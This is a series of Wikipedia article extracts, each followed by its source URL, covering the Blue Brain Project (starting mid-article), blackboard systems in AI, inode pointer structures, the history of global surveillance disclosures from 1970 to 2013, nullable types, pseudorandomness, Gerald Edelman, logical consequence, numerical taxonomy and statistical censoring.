BluePyOpt[27]is a tool that is used to build electrical models of single neurons. For this, it usesevolutionary algorithmsto constrain the parameters to experimental electrophysiological data. Attempts to reconstruct single neurons using BluePyOpt are reported by Rosanna Migliore,[28]and Stefano Masori.[29]
CoreNEURON[30]is a supplemental tool toNEURON, which allows large scale simulation by boosting memory usage and computational speed.
NeuroMorphoVis[31]is a visualisation tool for morphologies of neurons.
SONATA[32]is a joint effort between Blue Brain Project andAllen Institute for Brain Science, to develop a standard for data format, which realises a multiple platform working environment with greater computational memory and efficiency.
The project was funded primarily by theSwiss governmentand theFuture and Emerging Technologies(FET) Flagship grant from theEuropean Commission,[33]and secondarily by grants and donations from private individuals. The EPFL bought the Blue Gene computer at a reduced cost because it was still a prototype and IBM was interested in exploring how applications would perform on the machine. BBP was viewed as a validation of theBlue Genesupercomputer concept.[34]
Although the Blue Brain Project is often associated with theHuman Brain Project(HBP), it is important to distinguish between the two. While the Blue Brain Project was a key participant of the HBP, much of the criticism regarding targets and management issues actually pertains to theHuman Brain Projectrather than the Blue Brain Project itself.[35][36]
Voices raised as early as September 2014 highlighted concerns over the trajectory of the Human Brain Project, noting challenges in meeting its high-level goals and questioning its organizational structure and the project's key promoter, Professor Henry Markram.[37][38]In 2016, the HBP underwent a restructuring with resources originally earmarked for brain simulation redistributed to support a wider array of neuroscience research groups. Since then, scientists and engineers from the Blue Brain Project have contributed to various aspects of the HBP, including the Neuroinformatics, EBRAINS, Neurorobotics, and High-Performance Computing Platforms.[39]This distinction is important because some of the criticism directed at the initial incarnation of HBP may have been misattributed to the Blue Brain Project due to their shared leadership and early involvement in the initiative.
The Cajal Blue Brain Project is coordinated by theTechnical University of Madridled byJavier de Felipeand uses the facilities of theSupercomputing and Visualization Center of Madridand its supercomputerMagerit.[40]TheCajal Institutealso participates in this collaboration. The main lines of research currently being pursued atCajal Blue Braininclude neurological experimentation and computer simulations.[41]Nanotechnology, in the form of a newly designed brain microscope, plays an important role in its research plans.[42]
Noah Huttoncreated the documentary filmIn Silicoover a 10-year period. The film was released in April 2021.[43]The film covers the "shifting goals and landmarks"[44]of the Blue Brain Project as well as the drama, "In the end, this isn’t about science. It’s about the universals of power, greed, ego, and fame."[45][46]
|
https://en.wikipedia.org/wiki/Blue_Brain_Project
|
Ablackboard systemis anartificial intelligenceapproach based on theblackboard architectural model,[1][2][3][4]where a commonknowledge base, the "blackboard", is iteratively updated by a diverse group of specialist knowledge sources, starting with a problem specification and ending with a solution. Each knowledge source updates the blackboard with a partial solution when its internal constraints match the blackboard state. In this way, the specialists work together to solve the problem. The blackboard model was originally designed as a way to handle complex, ill-defined problems, where the solution is the sum of its parts.
The following scenario provides a simple metaphor that gives some insight into how a blackboard functions:
A group of specialists are seated in a room with a largeblackboard. They work as a team to brainstorm a solution to a problem, using the blackboard as the workplace for cooperatively developing the solution.
The session begins when the problem specifications are written onto the blackboard. The specialists all watch the blackboard, looking for an opportunity to apply their expertise to the developing solution. When someone writes something on the blackboard that allows another specialist to apply their expertise, the second specialist records their contribution on the blackboard, hopefully enabling other specialists to then apply their expertise. This process of adding contributions to the blackboard continues until the problem has been solved.
A blackboard-system application consists of three major components
A blackboard system is the central space in amulti-agent system. It's used for describing the world as a communication platform for agents. To realize a blackboard in a computer program, amachine readablenotation is needed in whichfactscan be stored. One attempt in doing so is aSQL database, another option is theLearnable Task Modeling Language (LTML). The syntax of the LTML planning language is similar toPDDL, but adds extra features like control structures andOWL-Smodels.[5][6]LTML was developed in 2007[7]as part of a much larger project called POIROT (Plan Order Induction by Reasoning from One Trial),[8]which is aLearning from demonstrationsframework forprocess mining. In POIROT,Plan tracesandhypothesesare stored in the LTML syntax for creatingsemantic web services.[9]
Here is a small example: A human user is executing aworkflowin a computer game. The user presses some buttons and interacts with thegame engine. While the user interacts with the game, a plan trace is created. That means the user's actions are stored in alogfile. The logfile gets transformed into a machine readable notation which is enriched by semanticattributes. The result is atextfilein the LTML syntax which is put on the blackboard.Agents(software programs in the blackboard system) are able to parse the LTML syntax.
We start by discussing two well known early blackboard systems, BB1 and GBB, below and then discuss more recent implementations and applications.
The BB1 blackboard architecture[10]was originally inspired by studies of how humans plan to perform multiple tasks in a trip, used task-planning as a simplified example of tactical planning for theOffice of Naval Research.[11]Hayes-Roth & Hayes-Roth found that human planning was more closely modeled as an opportunistic process, in contrast to the primarily top-down planners used at the time:
While not incompatible with successive-refinement models, our view of planning is somewhat different. We share the assumption that planning processes operate in a two-dimensional planning space defined on time and abstraction dimensions. However, we assume that people's planning activity is largely opportunistic. That is, at each point in the process, the planner's current decisions and observations suggest various opportunities for plan development. The planner's subsequent decisions follow up on selected opportunities. Sometimes, these decision-sequences follow an orderly path and produce a neat top-down expansion as described above. However, some decisions and observations might also suggest less orderly opportunities for plan development.[12]
A key innovation of BB1 was that it applied this opportunistic planning model to its own control, using the same blackboard model of incremental, opportunistic, problem-solving that was applied to solve domain problems. Meta-level reasoning with control knowledge sources could then monitor whether planning and problem-solving were proceeding as expected or stalled. If stalled, BB1 could switch from one strategy to another as conditions – such as the goals being considered or the time remaining – changed. BB1 was applied in multiple domains: construction site planning,[13]inferring 3-D protein structures from X-ray crystallography,[14]intelligent tutoring systems,[15]and real-time patient monitoring.[16]
BB1 also allowed domain-general language frameworks to be designed for wide classes of problems. For example, the ACCORD[17]language framework defined a particular approach to solving configuration problems. The problem-solving approach was to incrementally assemble a solution by adding objects and constraints, one at a time. Actions in the ACCORD language framework appear as short English-like commands or sentences for specifying preferred actions, events to trigger KSes, preconditions to run a KS action, and obviation conditions to discard a KS action that is no longer relevant.
GBB[18]focused on efficiency, in contrast to BB1, which focused more on sophisticated reasoning and opportunistic planning. GBB improves efficiency by allowing blackboards to be multi-dimensional, where dimensions can be either ordered or not, and then by increasing the efficiency of pattern matching. GBB1,[19]one of GBB's control shells implements BB1's style of control while adding efficiency improvements.
Other well-known of early academic blackboard systems are the Hearsay IIspeech recognitionsystem andDouglas Hofstadter'sCopycatand Numbo projects.
Some more recent examples of deployed real-world applications include:
Blackboard systems are used routinely in many militaryC4ISTARsystems for detecting and tracking objects. Another example of current use is inGame AI, where they are considered a standard AI tool to help with adding AI to video games.[22][23]
Blackboard-like systems have been constructed within modernBayesianmachine learningsettings, using agents to add and removeBayesian networknodes. In these 'Bayesian Blackboard' systems, the heuristics can acquire more rigorous probabilistic meanings as proposal and acceptances inMetropolis Hastings samplingthough the space of possible structures.[24][25][26]Conversely, using these mappings, existing Metropolis-Hastings samplers over structural spaces may now thus be viewed as forms of blackboard systems even when not named as such by the authors. Such samplers are commonly found inmusical transcriptionalgorithms for example.[27]
Blackboard systems have also been used to build large-scale intelligent systems for the annotation of media content, automating parts of traditional social science research. In this domain, the problem of integrating various AI algorithms into a single intelligent system arises spontaneously, with blackboards providing a way for a collection of distributed, modularnatural language processingalgorithms to each annotate the data in a central space, without needing to coordinate their behavior.[28]
|
https://en.wikipedia.org/wiki/Blackboard_system
|
Theinode pointer structureis a structure adopted by theinodeof a file in theVersion 6 Unixfile system,Version 7 Unixfile system, andUnix File System(UFS) to list the addresses of a file'sdata blocks. It is also adopted by many related file systems, including theext3file system, popular with Linux users.
In the file system used inVersion 6 Unix, an inode contains eight pointers:[1]
In the file system used inVersion 7 Unix, an inode contains thirteen pointers:[2]
In theUnix file system, an inode contains fifteen pointers:[3]
The levels of indirection indicate the number of pointer that must be followed before reaching actual file data.
The structure is partially illustrated in the diagram accompanying this article. The structure allows for inodes to describe very large files in file systems with a fixed logical block size. Central to the mechanism is that blocks of addresses (also calledindirect blocks) are only allocated as needed. For example, in theUnix file system, a 12-block file would be described using just the inode because its blocks fit into the number of direct pointers available. However, a 13-block file needs an indirect block to contain the thirteenth address.
The inode pointer structure not only allows for files to easily be allocated to non-contiguous blocks, it also allows the data at a particular location inside a file to be easily located. This is possible because the logical block size is fixed. For example, if each block is 8 kB, file data at 112 kB to 120 kB would be pointed to by the third pointer of the first indirect block (assuming twelve direct pointers in the inode pointer structure).
Unlike inodes, which are fixed in number and allocated in a special part of the file system, the indirect blocks may be of any number and are allocated in the same part of the file system as data blocks. The number of pointers in the indirect blocks is dependent on the block size and size of block pointers. Example: with a 512-byte block size, and 4-byte block pointers, each indirect block can consist of 128 (512 / 4) pointers.
|
https://en.wikipedia.org/wiki/Inode_pointer_structure
|
Global surveillancerefers to the practice ofglobalizedmass surveillanceon entire populations across national borders.[1]Although its existence was first revealed in the 1970s and led legislators to attempt to curb domestic spying by theNational Security Agency(NSA), it did not receive sustained public attention until the existence ofECHELONwas revealed in the 1980s and confirmed in the 1990s.[2]In 2013 it gained substantial worldwide media attention due to theglobal surveillance disclosurebyEdward Snowden.[3]
In 1972 NSA analystPerry Fellwock(under the pseudonym "Winslow Peck") introduced the readers ofRampartsmagazine to the NSA and theUKUSA Agreement.[4]In 1976, a separate article inTime Outmagazine revealed the existence of theGCHQ.[5]
In 1982James Bamford's book about the NSA,The Puzzle Palace, was first published. Bamford's second book,Body of Secrets: Anatomy of the Ultra-Secret National Security Agency, was published two decades later.
In 1988 theECHELONnetwork was revealed byMargaret Newsham, aLockheedemployee. Newsham told a member of the U.S. Congress that telephone calls ofStrom Thurmond, aRepublicanU.S. senator, were being collected by the NSA. Congressional investigators determined that "targeting of U.S. political figures would not occur by accident. But was designed into the system from the start."[6]
By the late 1990sECHELONwas reportedly capable of monitoring up to 90% of all internet traffic.[7]According to theBBCin May 2001, however, "The US Government still refused to admit that Echelon even exists."[7]
In the aftermath of theSeptember 11 attacks,William Binney, along with colleaguesJ. Kirke WiebeandEdward Loomisand in cooperation with House stafferDiane Roark, asked the U.S. Defense Department to investigate the NSA for allegedly wasting "millions and millions of dollars" onTrailblazer, a system intended to analyze data carried on communications networks such as the Internet. Binney was also publicly critical of the NSA for spying on U.S. citizens after theSeptember 11, 2001 attacks.[8]Binney claimed that the NSA had failed to uncover the 9/11 plot despite its massive interception of data.[9]
In 2001, after the September 11 attacks,MI5started collecting bulk telephone communications data in the United Kingdom (i.e. what telephone numbers called each other and when) and authorized theHome Secretaryunder theTelecommunications Act 1984instead of theRegulation of Investigatory Powers Act 2000, which would have brought independent oversight and regulation. This was kept secret until announced by the then Home Secretary in 2015.[10][11][12]
On December 16, 2005,The New York Timespublished a report under the headline "BushLets U.S. Spy on Callers Without Courts," which was co-written byEric Lichtblauand thePulitzer Prize-winning journalistJames Risen. According toThe Times, the article's date of publication was delayed for a year (past the next presidential election cycle) because of alleged national security concerns.[13]Russ Ticewas later revealed as a major source.
In 2006, further details of the NSA's domestic surveillance of U.S. citizens was provided byUSA Today. The newspaper released a report on May 11, 2006 detailing the NSA's "massive database" of phone records collected from "tens of millions" of U.S. citizens. According toUSA Today, these phone records were provided by several telecom companies such asAT&T,Verizon, andBellSouth.[15]AT&T technicianMark Kleinwas later revealed as major source, specifically of rooms at network control centers on the internet backbone intercepting and recording all traffic passing through. In 2008 the security analystBabak Pasdarrevealed the existence of the so-called "Quantico circuit" that he and his team had set up in 2003. The circuit provided the U.S. federal government with abackdoorinto the network of an unnamed wireless provider, which was later independently identified asVerizon.[16]
In 2007, formerQwestCEOJoseph Nacchioalleged in court and provided supporting documentation that in February 2001 (nearly 7 months prior to theSeptember 11 attacks) that the NSA proposed in a meeting to conduct blanket phone spying. He considered the spying to be illegal and refused to cooperate, and claims that the company was punished by being denied lucrative contracts.[17]
In 2011 details of themass surveillance industrywere released byWikiLeaks. According toJulian Assange, "We are in a world now where not only is it theoretically possible to record nearly all telecommunications traffic out of a country, all telephone calls, but where there is aninternational industryselling the devices now to do it."[18]
|
https://en.wikipedia.org/wiki/Global_surveillance_disclosures_(1970%E2%80%932013)
|
Nullable typesare a feature of someprogramming languageswhich allow a value to be set to the special value NULL instead of the usual possible values of thedata type. In statically typed languages, a nullable type is anoption type,[citation needed]while in dynamically typed languages (where values have types, but variables do not), equivalent behavior is provided by having a single null value.
NULL is frequently used to represent a missing value or invalid value, such as from a function that failed to return or a missing field in a database, as inNULLinSQL. In other words, NULL is undefined.
Primitive typessuch asintegersandBooleanscannot generally be null, but the corresponding nullable types (nullable integer and nullable Boolean, respectively) can also assume the NULL value.[jargon][citation needed]This can be represented in ternary logic as FALSE, NULL, TRUE as inthree-valued logic.
An integer variable may represent integers, but 0 (zero) is a special case because 0 in many programming languages can mean "false". Also, this does not provide any notion of saying that the variable is empty, a need that arises in many circumstances. This need can be achieved with a nullable type. In programming languages likeC#2.0, a nullable integer, for example, can be declared by a question mark (int? x).[1][2]: 46In programming languages likeC#1.0, nullable types can be defined by an external library[3]as new types (e.g. NullableInteger, NullableBoolean).[4]
A Boolean variable makes the effect more clear. Its values can be either "true" or "false", while a nullable Boolean may also contain a representation for "undecided". However, the interpretation or treatment of a logical operation involving such a variable depends on the language.
In contrast, objectpointerscan be set toNULLby default in most common languages, meaning that the pointer or reference points to nowhere, that no object is assigned (the variable does not point to any object). Nullable references were invented byC. A. R. Hoarein 1965 as part of theAlgol Wlanguage. Hoare later described his invention as a "billion-dollar mistake".[5]This is because object pointers that can be NULL require the user to check the pointer before using it and require specific code to handle the case when the object pointer is NULL.
Javahas classes that correspond to scalar values, such as Integer, Boolean, and Float. Combined withautoboxing(automatic usage-driven conversion between object and value), this effectively allows nullable variables for scalar values.[citation needed]
Nullable type implementations usually adhere to thenull object pattern.
There is a more general and formal concept that extend the nullable type concept: it comes fromoption types, which enforce explicit handling of the exceptional case.
The following programming languages support nullable types.
Statically typed languages with native null support include:
Statically typed languages with library null support include:
Dynamically-typed languages with null include:
|
https://en.wikipedia.org/wiki/Nullable_type
|
Apseudorandomsequence of numbers is one that appears to bestatistically random, despite having been produced by a completelydeterministicand repeatable process.[1]Pseudorandom number generatorsare often used in computer programming, as traditional sources of randomness available to humans (such as rolling dice) rely on physical processes not readily available to computer programs, although developments inhardware random number generatortechnology have challenged this.
The generation of random numbers has many uses, such as forrandom sampling,Monte Carlo methods,board games, orgambling. Inphysics, however, most processes, such as gravitational acceleration, are deterministic, meaning that they always produce the same outcome from the same starting point. Some notable exceptions areradioactive decayandquantum measurement, which are both modeled as being truly random processes in the underlying physics. Since these processes are not practical sources of random numbers, pseudorandom numbers are used, which ideally have the unpredictability of a truly random sequence, despite being generated by a deterministic process.[2]
In many applications, the deterministic process is acomputer algorithmcalled apseudorandom number generator, which must first be provided with a number called arandom seed. Since the same seed will yield the same sequence every time, it is important that the seed be well chosen and kept hidden, especially insecurityapplications, where the pattern's unpredictability is a critical feature.[3]
In some cases where it is important for the sequence to be demonstrably unpredictable, physical sources of random numbers have been used, such as radioactive decay, atmospheric electromagnetic noise harvested from a radio tuned between stations, or intermixed timings ofkeystrokes.[1][4]The time investment needed to obtain these numbers leads to a compromise: using some of these physics readings as a seed for a pseudorandom number generator.
Before modern computing, researchers requiring random numbers would either generate them through various means (dice,cards,roulette wheels,[5]etc.) or use existing random number tables.
The first attempt to provide researchers with a ready supply of random digits was in 1927, when the Cambridge University Press published a table of 41,600 digits developed byL.H.C. Tippett. In 1947, theRAND Corporationgenerated numbers by the electronic simulation of a roulette wheel;[5]the results were eventually published in 1955 asA Million Random Digits with 100,000 Normal Deviates.
Intheoretical computer science, adistributionispseudorandomagainst a class of adversaries if no adversary from the class can distinguish it from the uniform distribution with significant advantage.[6]This notion of pseudorandomness is studied incomputational complexity theoryand has applications tocryptography.
Formally, letSandTbe finite sets and letF= {f:S→T} be a class of functions. AdistributionDoverSis ε-pseudorandomagainstFif for everyfinF, thestatistical distancebetween the distributionsf(X){\displaystyle f(X)}andf(Y){\displaystyle f(Y)}, whereX{\displaystyle X}is sampled fromDandY{\displaystyle Y}is sampled from theuniform distributiononS, is at most ε.
In typical applications, the classFdescribes a model of computation with bounded resources and one is interested in designing distributionsDwith certain properties that are pseudorandom againstF. The distributionDis often specified as the output of apseudorandom generator.[7]
|
https://en.wikipedia.org/wiki/Pseudorandomness
|
Gerald Maurice Edelman(/ˈɛdəlmən/; July 1, 1929 – May 17, 2014) was an Americanbiologistwho shared the 1972Nobel Prize in Physiology or Medicinefor work withRodney Robert Porteron theimmune system.[1]Edelman's Nobel Prize-winning research concerned discovery of the structure ofantibodymolecules.[2]In interviews, he has said that the way the components of the immune system evolve over the life of the individual is analogous to the way the components of the brain evolve in a lifetime. There is a continuity in this way between his work on the immune system, for which he won theNobel Prize, and his later work inneuroscienceand inphilosophy of mind.
Gerald Edelman was born in 1929[3]inOzone Park, Queens, New York, toJewishparents,physicianEdward Edelman, and Anna (née Freedman) Edelman, who worked in the insurance industry.[4]He studied violin for years, but eventually realized that he did not have the inner drive needed to pursue a career as a concert violinist, and decided to go into medical research instead.[5]He attended public schools in New York, graduating fromJohn Adams High School,[6]and then attendedUrsinus College, where he graduatedmagna cum laudewith aB.S.in 1950. He received anM.D.from theUniversity of Pennsylvania School of Medicinein 1954.[4]
After a year at the Johnson Foundation for Medical Physics, Edelman became aresidentat theMassachusetts General Hospital; he then practiced medicine in France while serving withUS Army Medical Corps.[4]In 1957, Edelman joined theRockefeller Institute for Medical Researchas a graduate fellow, working in the laboratory of Henry Kunkel and receiving aPh.D.in 1960.[4]The institute made him the assistant (later associate) dean of graduate studies; he became a professor at the school in 1966.[4]In 1992, he moved toCaliforniaand became a professor ofneurobiologyatThe Scripps Research Institute.[7]
After his Nobel prize award, Edelman began research into the regulation of primarycellular processes, particularly the control of cell growth and the development ofmulti-celled organisms, focusing on cell-to-cell interactions in earlyembryonic developmentand in the formation and function of the nervous system. These studies led to the discovery ofcell adhesion molecules(CAMs), which guide the fundamental processes that help an animal achieve its shape and form, and by which nervous systems are built. One of the most significant discoveries made in this research is that the precursorgenefor the neural cell adhesion molecule gave rise in evolution to the entire molecular system ofadaptive immunity.[8]
For his efforts, Edelman was an elected member of both theAmerican Academy of Arts and Sciences(1968) and theAmerican Philosophical Society(1977).[9][10]
While in Paris serving in the Army, Edelman read a book that sparked his interest inantibodies.[11]He decided that, since the book said so little about antibodies, he would investigate them further upon returning to the United States, which led him to studyphysical chemistryfor his 1960 Ph.D.[11]Research by Edelman and his colleagues andRodney Robert Porterin the early 1960s produced fundamental breakthroughs in the understanding of the antibody's chemical structure, opening a door for further study.[12]For this work, Edelman and Porter shared theNobel Prize in Physiology or Medicinein 1972.[1]
In its Nobel Prize press release in 1972, theKarolinska Institutetlauded Edelman and Porter's work as a major breakthrough:
The impact of Edelman's and Porter's discoveries is explained by the fact that they provided a clear picture of the structure and mode of action of a group of biologically particularly important substances. By this they laid a firm foundation for truly rational research, something that was previously largely lacking in immunology. Their discoveries represent clearly a break-through that immediately incited a fervent research activity the whole world over, in all fields of immunological science, yielding results of practical value for clinical diagnostics and therapy.[13]
Edelman's early research on the structure of antibody proteins revealed thatdisulfide bondslink together the protein subunits.[2]The protein subunits of antibodies are of two types, the larger heavy chains and the smaller light chains. Two light and two heavy chains are linked together by disulfide bonds to form a functional antibody.
Using experimental data from his own research and the work of others, Edelman developed molecular models of antibody proteins.[14]A key feature of these models included the idea that theantigenbinding domains of antibodies (Fab) includeamino acidsfrom both thelightandheavyprotein subunits. The inter-chain disulfide bonds help bring together the two parts of the antigen binding domain.
Edelman and his colleagues usedcyanogen bromideandproteasesto fragment the antibody protein subunits into smaller pieces that could be analyzed for determination of theiramino acid sequence.[15][16]At the time when the first complete antibody sequence was determined (1969)[17]it was the largest complete protein sequence that had ever been determined. The availability of amino acid sequences of antibody proteins allowed recognition of the fact that the body can produce many different antibody proteins with similar antibody constant regions and divergent antibodyvariable regions.
Topobiology is Edelman's theory which asserts that morphogenesis is driven by differential adhesive interactions among heterogeneous cell populations and it explains how a single cell can give rise to a complex multi-cellular organism. As proposed by Edelman in 1988, topobiology is the process that sculpts and maintains differentiated tissues and is acquired by the energetically favored segregation of cells through heterologous cellular interactions.
In his later career, Edelman was noted for his theory ofconsciousness, documented in a trilogy of technical books and in several subsequent books written for a general audience, includingBright Air, Brilliant Fire(1992),[18][19]A Universe of Consciousness(2001, withGiulio Tononi),Wider than the Sky(2004) andSecond Nature: Brain Science and Human Knowledge(2007).
InSecond NatureEdelman defines human consciousness as:
The first of Edelman's technical books,The Mindful Brain(1978),[20]develops his theory ofNeural Darwinism, which is built around the idea of plasticity in the neural network in response to the environment. The second book,Topobiology(1988),[21]proposes a theory of how the original neuronal network of a newborn'sbrainis established during development of theembryo.The Remembered Present(1990)[22]contains an extended exposition of his theory ofconsciousness.
In his books, Edelman proposed a biological theory of consciousness, based on his studies of the immune system. He explicitly roots his theory withinCharles Darwin's Theory ofNatural Selection, citing the key tenets of Darwin's population theory, which postulates that individual variation within species provides the basis for the natural selection that eventually leads to the evolution of new species.[23]He explicitly rejecteddualismand also dismissed newer hypotheses such as the so-called'computational' model of consciousness, which liken the brain's functions to the operations of a computer. Edelman argued that mind and consciousness are purely biological phenomena, arising from complex cellular processes within the brain, and that the development of consciousness and intelligence can be explained by Darwinian theory.
Edelman's theory seeks to explain consciousness in terms of the morphology of the brain. A brain comprises a massive population of neurons (approx. 100billioncells) each with an enormous number of synaptic connections to other neurons. During development, the subset of connections that survive the initial phases of growth and development will make approximately 100trillionconnections with each other. A sample of brain tissue the size of a match head contains about a billion connections, and if we consider how these neuronal connections might be variously combined, the number of possible permutations becomes hyper-astronomical – in the order of ten followed by millions of zeros.[24]The young brain contains many more neural connections than will ultimately survive to maturity, and Edelman argued that this redundant capacity is needed because neurons are the only cells in the body that cannot be renewed and because only those networks best adapted to their ultimate purpose will be selected as they organize into neuronal groups.
Edelman's theory of neuronal group selection, also known as 'Neural Darwinism', has three basic tenets—Developmental Selection, Experiential Selection and Reentry.
Edelman and Gally were the first to point out the pervasiveness ofdegeneracyin biological systems and the fundamental role that degeneracy plays in facilitating evolution.[27]
Edelman founded and directedThe Neurosciences Institute, a nonprofit research center inSan Diegothat between 1993 and 2012 studied the biological bases of higher brain function in humans. He served on the scientific board of the World Knowledge Dialogue project.[28]
Edelman was a member of theUSA Science and Engineering Festival's advisory board.[29]
Edelman married Maxine M. Morrison in 1950.[4]They have two sons,Eric, a visual artistin New York City, andDavid, an adjunct professor of neuroscienceatUniversity of San Diego. Their daughter,Judith Edelman, is abluegrassmusician,[30]recording artist, and writer. Some observers[who?]have noted that a character inRichard Powers'The Echo Makermay be a nod at Edelman.
Later in his life, he hadprostate cancerandParkinson's disease.[31]Edelman died on May 17, 2014, inLa Jolla, California, aged 84.[3][32][33]
|
https://en.wikipedia.org/wiki/Gerald_Edelman
|
Logical consequence(alsoentailmentorlogical implication) is a fundamentalconceptinlogicwhich describes the relationship betweenstatementsthat hold true when one statement logicallyfollows fromone or more statements. Avalidlogicalargumentis one in which theconclusionis entailed by thepremises, because the conclusion is the consequence of the premises. Thephilosophical analysisof logical consequence involves the questions: In what sense does a conclusion follow from its premises? and What does it mean for a conclusion to be a consequence of premises?[1]All ofphilosophical logicis meant to provide accounts of the nature of logical consequence and the nature oflogical truth.[2]
Logical consequence isnecessaryandformal, by way of examples that explain withformal proofandmodels of interpretation.[1]A sentence is said to be a logical consequence of a set of sentences, for a givenlanguage,if and only if, using only logic (i.e., without regard to anypersonalinterpretations of the sentences) the sentence must be true if every sentence in the set is true.[3]
Logicians make precise accounts of logical consequence regarding a givenlanguageL{\displaystyle {\mathcal {L}}}, either by constructing adeductive systemforL{\displaystyle {\mathcal {L}}}or by formalintended semanticsfor languageL{\displaystyle {\mathcal {L}}}. The Polish logicianAlfred Tarskiidentified three features of an adequate characterization of entailment: (1) The logical consequence relation relies on thelogical formof the sentences: (2) The relation isa priori, i.e., it can be determined with or without regard toempirical evidence(sense experience); and (3) The logical consequence relation has amodalcomponent.[3]
The most widely prevailing view on how best to account for logical consequence is to appeal to formality. This is to say that whether statements follow from one another logically depends on the structure orlogical formof the statements without regard to the contents of that form.
Syntactic accounts of logical consequence rely onschemesusinginference rules. For instance, we can express the logical form of a valid argument as:
This argument is formally valid, because everyinstanceof arguments constructed using this scheme is valid.
This is in contrast to an argument like "Fred is Mike's brother's son. Therefore Fred is Mike's nephew." Since this argument depends on the meanings of the words "brother", "son", and "nephew", the statement "Fred is Mike's nephew" is a so-calledmaterial consequenceof "Fred is Mike's brother's son", not a formal consequence. A formal consequence must be truein all cases, however this is an incomplete definition of formal consequence, since even the argument "PisQ's brother's son, thereforePisQ's nephew" is valid in all cases, but is not aformalargument.[1]
If it is known thatQ{\displaystyle Q}follows logically fromP{\displaystyle P}, then no information about the possible interpretations ofP{\displaystyle P}orQ{\displaystyle Q}will affect that knowledge. Our knowledge thatQ{\displaystyle Q}is a logical consequence ofP{\displaystyle P}cannot be influenced byempirical knowledge.[1]Deductively valid arguments can be known to be so without recourse to experience, so they must be knowable a priori.[1]However, formality alone does not guarantee that logical consequence is not influenced by empirical knowledge. So the a priori property of logical consequence is considered to be independent of formality.[1]
The two prevailing techniques for providing accounts of logical consequence involve expressing the concept in terms ofproofsand viamodels. The study of the syntactic consequence (of a logic) is called (its)proof theorywhereas the study of (its) semantic consequence is called (its)model theory.[4]
A formulaA{\displaystyle A}is asyntactic consequence[5][6][7][8][9]within someformal systemFS{\displaystyle {\mathcal {FS}}}of a setΓ{\displaystyle \Gamma }of formulas if there is aformal proofinFS{\displaystyle {\mathcal {FS}}}ofA{\displaystyle A}from the setΓ{\displaystyle \Gamma }. This is denotedΓ⊢FSA{\displaystyle \Gamma \vdash _{\mathcal {FS}}A}. The turnstile symbol⊢{\displaystyle \vdash }was originally introduced by Frege in 1879, but its current use only dates back to Rosser and Kleene (1934–1935).[9]
Syntactic consequence does not depend on anyinterpretationof the formal system.[10]
A formulaA{\displaystyle A}is asemantic consequencewithin some formal systemFS{\displaystyle {\mathcal {FS}}}of a set of statementsΓ{\displaystyle \Gamma }if and only if there is no modelI{\displaystyle {\mathcal {I}}}in which all members ofΓ{\displaystyle \Gamma }are true andA{\displaystyle A}is false.[11]This is denotedΓ⊨FSA{\displaystyle \Gamma \models _{\mathcal {FS}}A}. Or, in other words, the set of the interpretations that make all members ofΓ{\displaystyle \Gamma }true is a subset of the set of the interpretations that makeA{\displaystyle A}true.
Modalaccounts of logical consequence are variations on the following basic idea:
Alternatively (and, most would say, equivalently):
Such accounts are called "modal" because they appeal to the modal notions oflogical necessityandlogical possibility. 'It is necessary that' is often expressed as auniversal quantifieroverpossible worlds, so that the accounts above translate as:
Consider the modal account in terms of the argument given as an example above:
The conclusion is a logical consequence of the premises because we can not imagine a possible world where (a) all frogs are green; (b) Kermit is a frog; and (c) Kermit is not green.
Modal-formal accounts of logical consequence combine the modal and formal accounts above, yielding variations on the following basic idea:
The accounts considered above are all "truth-preservational", in that they all assume that the characteristic feature of a good inference is that it never allows one to move from true premises to an untrue conclusion. As an alternative, some have proposed "warrant-preservational" accounts, according to which the characteristic feature of a good inference is that it never allows one to move from justifiably assertible premises to a conclusion that is not justifiably assertible. This is (roughly) the account favored byintuitionists.
The accounts discussed above all yieldmonotonicconsequence relations, i.e. ones such that ifA{\displaystyle A}is a consequence ofΓ{\displaystyle \Gamma }, thenA{\displaystyle A}is a consequence of any superset ofΓ{\displaystyle \Gamma }. It is also possible to specify non-monotonic consequence relations to capture the idea that, e.g., 'Tweety can fly' is a logical consequence of
but not of
|
https://en.wikipedia.org/wiki/Logical_implication
|
Numerical taxonomyis aclassification systemin biologicalsystematicswhich deals with the grouping bynumerical methodsoftaxonomic unitsbased on their character states.[1]It aims to create ataxonomyusing numeric algorithms likecluster analysisrather than using subjective evaluation of their properties. The concept was first developed byRobert R. SokalandPeter H. A. Sneathin 1963[2]and later elaborated by the same authors.[3]They divided the field intopheneticsin which classifications are formed based on the patterns of overall similarities andcladisticsin which classifications are based on the branching patterns of the estimated evolutionary history of the taxa.In recent years many authors treat numerical taxonomy and phenetics as synonyms despite the distinctions made by those authors.[citation needed]
Although intended as an objective method, in practice the choice and implicit or explicitweightingof characteristics is influenced by available data and research interests of the investigator. What was made objective was the introduction of explicit steps to be used to createdendrogramsandcladogramsusing numerical methods rather than subjective synthesis of data.
|
https://en.wikipedia.org/wiki/Numerical_taxonomy
|
Instatistics,censoringis a condition in which thevalueof ameasurementorobservationis only partially known.
For example, suppose a study is conducted to measure the impact of a drug onmortality rate. In such a study, it may be known that an individual's age at death isat least75 years (but may be more). Such a situation could occur if the individual withdrew from the study at age 75, or if the individual is currently alive at the age of 75.
Censoring also occurs when a value occurs outside the range of ameasuring instrument. For example, a bathroom scale might only measure up to 140 kg, after which it rolls over 0 and continues to count up from there. If a 160 kg individual is weighed using the scale, the observer would only know that the individual's weight is 20mod140 kg (in addition to 160kg, they could weigh 20kg, 300kg, 440kg, and so on).
The problem of censored data, in which the observed value of some variable is partially known, is related to the problem ofmissing data, where the observed value of some variable is unknown.
Censoring should not be confused with the related idea oftruncation. With censoring, observations result either in knowing the exact value that applies, or in knowing that the value lies within aninterval. With truncation, observations never result in values outside a given range: values in the population outside the range are never seen or never recorded if they are seen. Note that in statistics, truncation is not the same asrounding.
Interval censoring can occur when observing a value requires follow-ups or inspections. Left and right censoring are special cases of interval censoring, with the beginning of the interval at zero or the end at infinity, respectively.
Estimation methodsfor using left-censored data vary, and not all methods of estimation may be applicable to, or the most reliable, for all data sets.[1]
A common misconception with time interval data is to class asleft censoredintervals when the start time is unknown. In these cases, we have a lower bound on the timeinterval; thus, the data isright censored(despite the fact that the missing start point is to the left of the known interval when viewed as a timeline!).
Special techniques may be used to handle censored data. Tests with specific failure times are coded as actual failures; censored data are coded for the type of censoring and the known interval or limit. Special software programs (oftenreliabilityoriented) can conduct amaximum likelihood estimationfor summary statistics, confidence intervals, etc.
